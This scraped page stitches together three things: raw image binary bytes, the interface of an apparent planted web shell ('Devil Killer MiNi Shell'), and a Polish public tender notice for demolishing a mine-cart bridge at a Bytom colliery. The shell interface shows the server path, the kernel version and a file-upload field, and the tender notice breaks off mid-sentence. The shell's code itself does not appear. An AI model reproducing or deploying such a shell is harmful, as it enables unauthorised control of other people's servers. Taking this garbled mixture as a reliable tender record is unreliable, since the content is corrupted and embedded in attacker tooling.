JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230322/0014566301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Likwidacja pomostu obiegu wozów 2.b.1 / pomostu załogi od szybu Rejtan do szybu Staszic 8.2” dla Spółki Restrukturyzacji Kopalń S.A. Oddział KWK „Centrum“. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Spółka Restrukturyzacji Kopalń S.A.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276902504</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Strzelców Bytomskich 207</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bytom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-914</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@srk.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.srk.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> JEDNOOSOBOWA SPÓŁKA SKARBU PAŃSTWA </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> GÓRNICTWO </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Likwidacja pomostu obiegu wozów 2.b.1 / pomostu załogi od szybu Rejtan do szybu Staszic 8.2” dla Spółki Restrukturyzacji Kopalń S.A. Oddział KWK „Centrum“. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b3452bbe-c87f-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00145663</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.srk.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://efo.coig.biz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Inne wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy Zakupowej:<br/>2. Dopuszczalne przeglądarki internetowe:<br/>- przeglądarka internetowa z włączoną obsługą JavaScript: Internet Explorer wersja 10 lub 11, Mozilla<br/>- Firefox od wersji 50 (bez wsparcia dla wersji beta), zainstalowane darmowe oprogramowanie JAVA<br/>- (JRE) – zgodnie z zaleceniami ze strony dostawcy Java, minimalna rozdzielczość ekranu wymagana<br/>do poprawnego wyświetlania 1366x786.<br/>3. Pozostałe wymagania techniczne:<br/>1) dostęp do sieci Internet,<br/>2) komputer klasy PC komputer klasy PC z jednym z następujących systemów operacyjnych: Windows<br/>7, Windows 8, Windows 10 (bez wsparcia dla Windows XP, Vista)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-C-0006/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I.	Przedmiot zamówienia: „Likwidacja pomostu obiegu wozów 2.b.1 / pomostu załogi od szybu Rejtan do szybu Staszic 8.2” dla Spółki Restrukturyzacji Kopalń S.A. Oddział KWK „Centrum“.<br/><br/>Lokalizacja: <br/>Spółka Restrukturyzacji Kopalń S.A. <br/>Oddział Kopalnia Węgla Kamiennego „Centrum”<br/>ul. Łużycka 7<br/>41-902 Bytom<br/>	<br/>1.	Charakterystyka obiektu:<br/>Pomost jest formą estakady usytuowanym około 9,5 m nad poziomem terenu. Obiekt kubaturowy wsparty na stalowych podporach, złożony z dwóch części: długiego pomostu l = ~45mb oraz poszerzonego pomostu z układem szyn rozprowadzających wózki w różnych kierunkach l =~24,5mb. Obiekt na kilku odcinkach przebiega nad innymi obiektami kopalni lub przechodzą przez jego kubaturę słupy nośne szybów – których konstrukcja nie może zostać naruszona. <br/>Konstrukcja pomostu z profili stalowych wypełnionych cegłą i prefabrykowanymi elementami betonowymi, ceramicznymi. Pokrycie papą x2. Podłoga pokryta blachą z wbudowanymi szynami do wózków na konstrukcji stalowej. Główna konstrukcja pomostu to kratownica z profili stalowych kątowników, ceowników oraz indywidualnie projektowane dźwigary z blachy i kątowników. <br/><br/>Dane ogólne obiektu<br/>Długość: ok. 69,55 m<br/>Szerokość: ok. 4,70-8,08 m<br/>Pow. zabudowy:	1471,96 m2<br/>Wysokość: 13,20 m (wysokość części kubaturowej 3,20 m)<br/>Kubatura: 1343,15 m3<br/><br/>2.	Zakres rzeczowy zamówienia obejmuje:<br/>	Rozbiórkę obiektu, usunięcie fundamentów podpór do głębokości -1,50m poniżej poziomu terenu.<br/>	Wyrównanie terenu po zakończeniu prac.<br/>	Uprzątnięcie terenu.<br/><br/>Prace zawsze należy prowadzić poczynając od najwyżej położonej partii obiektu (dachu) i przemieszczać się z robotami coraz niżej (w stronę fundamentów).<br/>Pozyskany złom stalowy składować na specjalnie do tego celu przygotowanym placu.<br/>Prace przygotowawcze będą polegały na:<br/>	zapewnieniu swobodnego dojazdu do likwidowanego obiektu, poprzez wyznaczenie drogi dojazdowej i usunięciu z niej wszelkich przeszkód takich jak zaparkowane samochody;<br/>	usunięciu wyposażenia obiektu, urządzeń oraz stalowych elementów niekonstrukcyjnych; <br/>	odłączeniu obiektu od sieci - prace te należy powierzyć uprawnionym osobom i wykonać pod nadzorem gestorów sieci, a następnie fakt ten potwierdzić wpisem w dzienniku budowy;<br/>	demontażu odłączonych instalacji.<br/><br/>KOLEJNOŚĆ WYKONYWANIA ROBÓT ROZBIÓRKOWYCH <br/>1)	Ręczne usunięcie śmieci i elementów wyposażenia, zbędnej instalacji. <br/>2)	Demontaż okien. <br/>3)	Demontaż części kubaturowej z odzyskiem elementów stalowych. <br/>4)	Demontaż podpór stalowych. <br/>5)	Skucie i usunięcie fundamentów do głębokości -1,50m poniżej poziomu terenu.<br/>6)	Zasypanie wykopów, wyrównanie terenu. <br/>7)	Roboty porządkowe i wykończeniowe.<br/><br/>Szczegółowy zakres robót budowlanych określa przedmiar robót stanowiący załącznik do SWZ oraz „Projekt rozbiórki pomostu obiegu wozów 2.b.5” opracowany przez RW PROJEKT Sp. z o.o. z siedzibą w Katowicach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111300-1 - Roboty rozbiórkowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia może ubiegać się Wykonawca spełniający następujące warunki udziału w postępowaniu:<br/>1)	Zamawiający uzna warunek w zakresie zdolności do występowania w obrocie gospodarczym za spełniony, jeżeli Wykonawca prowadzący działalność gospodarczą lub zawodową wykaże się wpisem do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania.<br/>2)	Zamawiający uzna warunek w zakresie zdolności technicznej i zawodowej jeżeli Wykonawca wykaże się:<br/>1.	dysponowaniem następującymi osobami, które zostaną skierowane do realizacji zamówienia publicznego, w szczególności odpowiedzialnymi za świadczenie usług, kontrole jakości lub kierowanie robotami budowlanymi posiadającymi uprawnienia:<br/>	minimum 1 osoba dozoru z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej bez ograniczeń i kwalifikacjami do wykonywania czynności w dozorze ruchu w podziemnych zakładach górniczych w specjalności budowlanej.<br/><br/>W/w osoba powinna posiadać uprawnienia uzyskane zgodnie z wymogami Ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz dysponować aktualnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa.<br/><br/>3)	należytym wykonaniem robót budowlanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w ramach jednej lub kilku umów polegających na wykonaniu remontów lub robót budowlanych o łącznej wartości minimum 150 000,00 zł brutto wraz z dowodami określającymi czy te roboty budowlane zostały wykonane należycie. <br/><br/>2.	Poleganie na zasobach innego podmiotu w celu potwierdzenia spełniania warunków udziału w postepowaniu przez Wykonawcę:<br/>1)	Wykonawca może, w celu potwierdzenia spełniania warunków udziału <br/>w postępowaniu w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. <br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>2)	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>3)	Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa powyżej potwierdza, że stosunek łączący Wykonawcę z podmiotami udostepniającymi zasoby gwarantuje rzeczywisty do tych zasobów oraz określa w szczególności:<br/>1.	zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2.	sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3.	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. <br/>4)	Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 3 i 4 ustawy Pzp, <br/>a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.	Podmiotowe środki dowodowe, jakie zobowiązany będzie złożyć Wykonawca, którego oferta zostanie najwyżej oceniona, lub Wykonawcy, których Zamawiający wezwie do złożenia wszystkich lub niektórych podmiotowych środków dowodowych w przypadkach, o których mowa w art. 274 ust. 2 ustawy Pzp:<br/>1)	Dokument potwierdzający, że Wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem; W przypadku gdy odpis jest dostępny bezpłatnie w publicznej bazie danych Zamawiający nie wymaga złożenia odpisu.<br/>2)	Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowania robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wzór Załącznik nr 3 do SWZ;<br/>3)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz <br/>z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – wzór Załącznik nr 4 do SWZ;<br/>4)	Oświadczenie Wykonawcy w celu potwierdzenia braku podstaw wykluczenia <br/>w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp – wzór Załącznik nr 5 do SWZ;<br/>3.	Wszystkie dokumenty lub oświadczenia, o których mowa w pkt. 9 składane są w oryginale <br/>w postaci dokumentu elektronicznego. W sytuacji, gdy dokumenty lub oświadczenia, o których mowa w pkt. 9 zostały wystawione przez upoważnione podmioty jako dokument w postaci papierowej, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, za wyjątkiem dokumentów, o których mowa w pkt.9.1.1) i w pkt.9.1.2.), może dokonać również notariusz</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Podmiotowe środki dowodowe składane przez Wykonawców wraz z ofertą na potwierdzenie braku podstaw wykluczenia oraz spełniania warunków udziału <br/>w postępowaniu:<br/>1)	Oświadczenie Wykonawcy o braku podstaw wykluczenia i spełnianiu warunków udziału w postępowaniu – wzór Załącznik nr 1 do Formularza Ofertowego;<br/>2)	Oświadczenie podmiotu udostępniającego zasoby o braku podstaw wykluczenia oraz spełnianiu warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby – wzór Załącznik nr 2 do Formularza Ofertowego;<br/>3)	Zobowiązanie podmiotu udostępniającego zasoby – wzór Załącznik nr 3 do Formularza Ofertowego;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający żąda złożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/>1)	Oświadczenie Wykonawcy o udzielonej gwarancji na przedmiot zamówienia zawarte w Formularzu Ofertowym;<br/>2)	Oświadczenie o uczestniczeniu w wizji lokalnej – wzór Załącznik nr 7 do Formularza Ofertowego;<br/>3)	Oświadczenie o ochronie środowiska – wzór Załącznik nr 8 do Formularza Ofertowego.<br/>2.	Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub<br/>złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>3.	Postanowień pkt 5.2. nie stosuje się, jeżeli przedmiotowy środek<br/>dowodowy służy wyłącznie potwierdzaniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe<br/>środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w<br/>wyznaczonym terminie <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.3.1.) Adres internetowy aukcji: <span class="normal">https://laip-srk.coig.biz/</span></h3> <h3 class="mb-0">6.3.2.) Opis aukcji elektronicznej: </h3> AUKCJA ELEKTRONICZNA<br/>1. Zgodnie z art . 281 ust. 2 pkt 17 ustawy Prawo zamówień publicznych Zamawiający informuje,<br/>że w niniejszym postępowaniu przewiduje aukcję elektroniczną.<br/>1.1. po dokonaniu badania złożonych ofert w celu wyboru najkorzystniejszej oferty<br/>przeprowadzona zostanie aukcja elektroniczna, jeżeli w postępowaniu złożone zostaną co<br/>najmniej dwie oferty dodatkowe niepodlegające odrzuceniu , lub co najmniej dwie oferty<br/>niepodlegające odrzuceniu gdy zamawiający zrezygnował z negocjacji<br/>1.2. w toku aukcji elektronicznej stosowane będzie kryterium ofert zgodnie<br/>z zapisami w SWZ w t oku aukcji licytowana będzie tylko cena<br/>1.3. sposób oceny ofert w toku aukcji elektronicznej będzie obejmował<br/>przeliczanie postąpień na punktową ocenę oferty, z uwzględnieniem punktacji<br/>otrzymanej przed otwarciem aukcji,<br/>1.4. w trakcie aukcji każdemu wykonawcy udostępniany jest: numer porządkowy przydzielony<br/>jego ofercie, aktualna pozycja w rankingu ofert, wysokość ceny najkorzystniejszej, wysokość<br/>postąpienia, które wykonawca powinien dokonać w celu złożenia najkorzystniejszej oferty przy<br/>uwzględnieniu zaoferowanych przez niego pozostałych kryteriów oceny ofert, czas pozostały do<br/>zakończenia aukcji,<br/>1.5. aukcja trwa dwadzieścia minut. Złożenie co najmniej jednego postąpienia w trakcie<br/>ostatnich 10 minut aukcji wydłuża ją o 10 minut dogrywki. Złożenie co najmniej jednego<br/>postąpienia w trakcie dogrywki wydłuża czas aukcji o kolejną dziesięciominutową dogrywkę.<br/>Zamawiający nie wprowadza ograniczeń co do liczby dogrywek.<br/>1.6. gdzie postąpienie zostanie określone na poziomie nie mniejszym niż 0,1 % ceny całkowitej<br/>ceny brutto, określonej w ofercie ocenionej najkorzystniejsza.<br/>2. Adres Portalu Aukcji Publicznych, na którym będzie prowadzona aukcja elektroniczna:<br/>https://laip srk.coig.biz/<br/>2.1. Wymagania dotyczące rejestracji i identyfikacji Wykonawców:<br/>a) Zaproszenie do udziału w aukcji między innymi komplet: login i hasło (umożliwiające<br/>zalogowanie aukcyjnego), zostanie przesłane Wykonawcom za pośrednictwem 